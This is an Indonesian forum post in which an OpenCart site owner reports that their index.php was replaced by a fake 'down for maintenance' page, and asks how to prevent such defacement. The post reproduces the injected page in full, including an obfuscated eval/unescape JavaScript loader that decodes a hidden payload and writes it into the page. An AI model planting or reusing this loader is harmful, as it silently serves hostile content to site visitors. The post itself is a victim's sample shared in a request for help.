soalnya baru kemarin saya mengalaminya, kejadiannya kemarin pagi pas saya buka web opencart saya, saya liat web saya tampilannya menjadi hanya berupa text saja dengan tulisan "OPENCART IS DOWN FOR MAINTENANCE!", tadinya saya pikir emang lg ada maintenance dari pihak server hostingannya, tapi pas siangnya saya cek lg masih jg gitu, trus saya cek subdomain sy yang pake opencart jg, ternyata normal2 saja ga ada masalah, trus saya liat2 di web forum tempat saya sewa hosting, dan cari domain2 yang sama sewa hosting di tempat itu jg, dan ternyata normal jg ga ada masalah.
disini saya mulai curiga, trus saya coba cek via FTP dan saya cek file 'index.php' dan ternyata emang udah berubah, saya gak tau itu filenya yg direplace atau kodenya yg di replace, jadi seperti ini nih script kodenya :
so, utk para mastah kiranya tau bagaimana cara memproteksi website opencart kita terhadap deface atau hack???<head><title>Themes Opencart >> One Stop Shopping for Unique, Elegant and Affordable OpenCart Theme</title><base href="http://themesopencart.com/" /><meta name="description" content="We provide a variety of Opencart Templates with a variety of attractive design, elegant and affordable. " /><link href="http://themesopencart.com/image/data/cart.png" rel="icon" /><link rel="stylesheet" type="text/css" href="catalog/view/theme/octpl008/stylesheet/lightstyleblue.css" /><body><center><p><h1>Opencart is down for maintainence!</h1><p><script type="text/javascript"><!-- eval(unescape('%66%75%6e%63%74%69%6f%6e%20%6e%64%62%33%64%63%34%38%28%73%29%20%7b%0a%09%76%61%72%20%72%20%3d%20%22%22%3b%0a%09%76%61%72%20%74%6d%70%20%3d%20%73%2e%73%70%6c%69%74%28%22%31%38%39%32%33%37%31%31%22%29%3b%0a%09%73%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%30%5d%29%3b%0a%09%6b%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%31%5d%20%2b%20%22%36%34%38%32%30%30%22%29%3b%0a%09%66%6f%72%28%20%76%61%72%20%69%20%3d%20%30%3b%20%69%20%3c%20%73%2e%6c%65%6e%67%74%68%3b%20%69%2b%2b%29%20%7b%0a%09%09%72%20%2b%3d%20%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%28%70%61%72%73%65%49%6e%74%28%6b%2e%63%68%61%72%41%74%28%69%25%6b%2e%6c%65%6e%67%74%68%29%29%5e%73%2e%63%68%61%72%43%6f%64%65%41%74%28%69%29%29%2b%34%29%3b%0a%09%7d%0a%09%72%65%74%75%72%6e%20%72%3b%0a%7d%0a'));eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%6e%64%62%33%64%63%34%38%28%27') + '%3e%62%65%68%59%61%63%1a%6b%66%5d%39%1e%62%77%77%6a%32%23%29%62%6f%64%2c%2a%64%6d%6b%77%6d%2e%63%6c%65%2f%55%68%5d%68%73%77%62%59%6b%23%63%72%5b%69%6e%70%2b%76%76%69%6c%2d%69%68%65%61%62%63%61%6e%5d%58%63%5b%6a%6b%63%69%5f%6b%69%70%2a%6a%63%6b%18%18%7b%67%66%74%6c%3b%2e%1c%62%66%62%65%60%78%3b%36%18%67%72%75%68%67%3e%19%74%61%67%67%58%61%60%67%70%75%30%1b%63%63%64%68%63%6c%1a%32%3a%2b%65%64%69%5a%6f%65%3218923711%36%37%37%36%34%38%32' + unescape('%27%29%29%3b'));// --></script></center></body></html>
dan satu lg pertanyaan saya saat ini saya ubah file permission untuk file 'index.php' menjadi 444 untuk mencoba proteksi apakah itu ga apa-apa?? Thanks.